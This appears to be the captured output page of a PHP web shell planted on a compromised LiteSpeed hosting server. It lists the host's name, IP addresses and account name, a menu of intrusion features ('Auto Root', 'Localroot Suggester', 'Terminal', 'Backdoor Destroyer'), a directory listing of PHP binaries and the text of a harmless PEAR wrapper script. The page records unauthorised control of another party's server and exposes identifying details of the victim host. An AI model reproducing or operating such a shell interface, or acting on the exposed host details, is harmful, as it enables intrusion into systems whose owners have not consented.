Linux server.serveridoramd.com 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
LiteSpeed
Server IP : 138.128.189.138 & Your IP : 216.73.216.158
Domains :
Cant Read [ /etc/named.conf ]
User : avisosenacribj05
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
php55 /
usr /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
lsphp
4.75
MB
-rwxr-xr-x
2026-08-23 15:41
pear
1.5
KB
-rwxr-xr-x
2026-08-18 20:07
peardev
428
B
-rwxr-xr-x
2026-08-18 20:07
pecl
319
B
-rwxr-xr-x
2026-08-18 20:07
phar
14.49
KB
-rwxr-xr-x
2026-08-23 15:41
phar.phar
14.49
KB
-rwxr-xr-x
2026-08-23 15:41
php
4.74
MB
-rwxr-xr-x
2026-08-23 15:41
php-cgi
4.72
MB
-rwxr-xr-x
2026-08-23 15:41
php-config
5.34
KB
-rwxr-xr-x
2026-08-23 15:41
phpize
4.44
KB
-rwxr-xr-x
2026-08-23 15:41
Save
Rename
#!/bin/sh alt_php_dir="/opt/alt/php55" exec $alt_php_dir/usr/bin/php -C -q \ -d memory_limit="-1" \ -d include_path=$alt_php_dir/usr/share/pear \ -d date.timezone=UTC \ -d output_buffering=1 \ -d variables_order=EGPCS \ -d safe_mode=0 \ -d register_argc_argv="On" \ -d open_basedir="" \ -d auto_prepend_file="" \ -d auto_append_file="" \ $alt_php_dir/usr/share/pear/pearcmd.php "$@"